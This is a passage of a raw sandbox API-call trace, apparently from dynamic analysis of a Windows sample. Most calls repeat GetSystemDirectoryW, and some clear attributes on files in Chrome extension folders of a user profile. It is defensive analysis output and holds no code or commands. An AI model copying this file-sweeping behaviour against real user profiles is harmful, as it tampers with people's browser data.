GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.825] CoTaskMemFree (pv=0x4e1c10) [0140.829] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.829] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.829] CoTaskMemFree (pv=0x4e1c10) [0140.832] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.832] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.832] CoTaskMemFree (pv=0x4e1c10) [0140.835] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.835] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.836] CoTaskMemFree (pv=0x4e1c10) [0140.838] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.839] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.839] CoTaskMemFree (pv=0x4e1c10) [0140.842] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.842] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.842] CoTaskMemFree (pv=0x4e1c10) [0140.845] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.845] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.845] CoTaskMemFree (pv=0x4e1c10) [0140.849] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.849] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.849] CoTaskMemFree (pv=0x4e1c10) [0140.850] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.850] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.850] CoTaskMemFree (pv=0x4e1c10) [0140.850] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.850] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.851] CoTaskMemFree (pv=0x4e1c10) [0140.856] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.866] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png", dwFileAttributes=0x80) returned 1 [0140.869] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.869] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.869] CoTaskMemFree (pv=0x4e1c10) [0140.873] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.873] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.873] CoTaskMemFree (pv=0x4e1c10) [0140.876] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.876] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.876] CoTaskMemFree (pv=0x4e1c10) [0140.880] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.880] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.880] CoTaskMemFree (pv=0x4e1c10) [0140.883] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.883] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.883] CoTaskMemFree (pv=0x4e1c10) [0140.886] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.886] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.887] CoTaskMemFree (pv=0x4e1c10) [0140.890] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.890] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.890] CoTaskMemFree (pv=0x4e1c10) [0140.893] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.893] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.894] CoTaskMemFree (pv=0x4e1c10) [0140.896] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.896] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.897] CoTaskMemFree (pv=0x4e1c10) [0140.900] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.900] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.900] CoTaskMemFree (pv=0x4e1c10) [0140.903] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.903] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.904] CoTaskMemFree (pv=0x4e1c10) [0140.907] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.907] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.907] CoTaskMemFree (pv=0x4e1c10) [0140.910] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.910] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.910] CoTaskMemFree (pv=0x4e1c10) [0140.914] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.914] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.914] CoTaskMemFree (pv=0x4e1c10) [0140.917] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.918] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.918] CoTaskMemFree (pv=0x4e1c10) [0140.920] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.920] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.920] CoTaskMemFree (pv=0x4e1c10) [0140.920] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.920] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.920] CoTaskMemFree (pv=0x4e1c10) [0140.921] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.921] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.922] CoTaskMemFree (pv=0x4e1c10) [0140.922] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.922] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.922] CoTaskMemFree (pv=0x4e1c10) [0140.923] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.923] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.924] CoTaskMemFree (pv=0x4e1c10) [0140.924] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.924] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.924] CoTaskMemFree (pv=0x4e1c10) [0140.925] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.925] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.925] CoTaskMemFree (pv=0x4e1c10) [0140.926] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.926] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.926] CoTaskMemFree (pv=0x4e1c10) [0140.928] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.928] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.928] CoTaskMemFree (pv=0x4e1c10) [0140.929] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.929] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.929] CoTaskMemFree (pv=0x4e1c10) [0140.930] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.930] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.930] CoTaskMemFree (pv=0x4e1c10) [0140.930] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.930] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.931] CoTaskMemFree (pv=0x4e1c10) [0140.932] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.932] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.932] CoTaskMemFree (pv=0x4e1c10) [0140.932] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.932] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.933] CoTaskMemFree (pv=0x4e1c10) [0140.934] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.934] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.934] CoTaskMemFree (pv=0x4e1c10) [0140.934] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.934] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.934] CoTaskMemFree (pv=0x4e1c10) [0140.935] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.936] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.936] CoTaskMemFree (pv=0x4e1c10) [0140.936] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.936] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.936] CoTaskMemFree (pv=0x4e1c10) [0140.937] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.937] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.938] CoTaskMemFree (pv=0x4e1c10) [0140.938] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.938] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.938] CoTaskMemFree (pv=0x4e1c10) [0140.939] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.939] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.940] CoTaskMemFree (pv=0x4e1c10) [0140.940] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.940] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.940] CoTaskMemFree (pv=0x4e1c10) [0140.941] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.941] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.941] CoTaskMemFree (pv=0x4e1c10) [0140.942] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.942] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.942] CoTaskMemFree (pv=0x4e1c10) [0140.943] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.943] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.943] CoTaskMemFree (pv=0x4e1c10) [0140.944] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.944] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.944] CoTaskMemFree (pv=0x4e1c10) [0140.944] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.944] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.945] CoTaskMemFree (pv=0x4e1c10) [0140.946] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.946] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.946] CoTaskMemFree (pv=0x4e1c10) [0140.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.955] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0140.958] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.962] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0140.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.969] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html", dwFileAttributes=0x80) returned 1 [0140.972] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.972] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.972] CoTaskMemFree (pv=0x4e1c10) [0140.976] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.976] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.976] CoTaskMemFree (pv=0x4e1c10) [0140.977] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.977] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.977] CoTaskMemFree (pv=0x4e1c10) [0140.978] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.978] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.978] CoTaskMemFree (pv=0x4e1c10) [0140.979] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.979] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.979] CoTaskMemFree (pv=0x4e1c10) [0140.980] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.980] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.980] CoTaskMemFree (pv=0x4e1c10) [0140.981] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.981] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.981] CoTaskMemFree (pv=0x4e1c10) [0140.982] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.982] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.982] CoTaskMemFree (pv=0x4e1c10) [0140.983] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.983] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.983] CoTaskMemFree (pv=0x4e1c10) [0140.984] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.984] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.984] CoTaskMemFree (pv=0x4e1c10) [0140.984] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.985] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.985] CoTaskMemFree (pv=0x4e1c10) [0140.986] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.986] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.986] CoTaskMemFree (pv=0x4e1c10) [0140.986] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.986] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.987] CoTaskMemFree (pv=0x4e1c10) [0140.988] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.988] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.988] CoTaskMemFree (pv=0x4e1c10) [0140.989] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.989] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.989] CoTaskMemFree (pv=0x4e1c10) [0140.990] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.990] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.990] CoTaskMemFree (pv=0x4e1c10) [0140.991] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.991] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.991] CoTaskMemFree (pv=0x4e1c10) [0140.993] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.993] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.993] CoTaskMemFree (pv=0x4e1c10) [0140.994] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.994] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.994] CoTaskMemFree (pv=0x4e1c10) [0140.995] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.995] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.995] CoTaskMemFree (pv=0x4e1c10) [0140.996] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.996] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.996] CoTaskMemFree (pv=0x4e1c10) [0140.997] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.997] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.997] CoTaskMemFree (pv=0x4e1c10) [0140.998] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.998] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.998] CoTaskMemFree (pv=0x4e1c10) [0141.000] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.000] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.000] CoTaskMemFree (pv=0x4e1c10) [0141.000] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.000] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.000] CoTaskMemFree (pv=0x4e1c10) [0141.001] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.001] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.002] CoTaskMemFree (pv=0x4e1c10) [0141.002] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.002] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.002] CoTaskMemFree (pv=0x4e1c10) [0141.003] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.003] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.004] CoTaskMemFree (pv=0x4e1c10) [0141.004] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.004] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.004] CoTaskMemFree (pv=0x4e1c10) [0141.005] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.005] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.006] CoTaskMemFree (pv=0x4e1c10) [0141.006] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.006] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.006] CoTaskMemFree (pv=0x4e1c10) [0141.007] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.007] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.008] CoTaskMemFree (pv=0x4e1c10) [0141.008] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.008] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.008] CoTaskMemFree (pv=0x4e1c10) [0141.009] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.009] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.010] CoTaskMemFree (pv=0x4e1c10) [0141.010] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.010] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.010] CoTaskMemFree (pv=0x4e1c10) [0141.012] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.012] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.012] CoTaskMemFree (pv=0x4e1c10) [0141.012] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.012] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.012] CoTaskMemFree (pv=0x4e1c10) [0141.013] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.013] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.014] CoTaskMemFree (pv=0x4e1c10) [0141.014] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.014] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.014] CoTaskMemFree (pv=0x4e1c10) [0141.016] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.016] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.016] CoTaskMemFree (pv=0x4e1c10) [0141.016] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.016] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.016] CoTaskMemFree (pv=0x4e1c10) [0141.018] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.018] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.018] CoTaskMemFree (pv=0x4e1c10) [0141.018] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.018] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.018] CoTaskMemFree (pv=0x4e1c10) [0141.019] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.019] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.019] CoTaskMemFree (pv=0x4e1c10) [0141.020] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.020] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.020] CoTaskMemFree (pv=0x4e1c10) [0141.021] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.021] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.021] CoTaskMemFree (pv=0x4e1c10) [0141.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0141.029] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 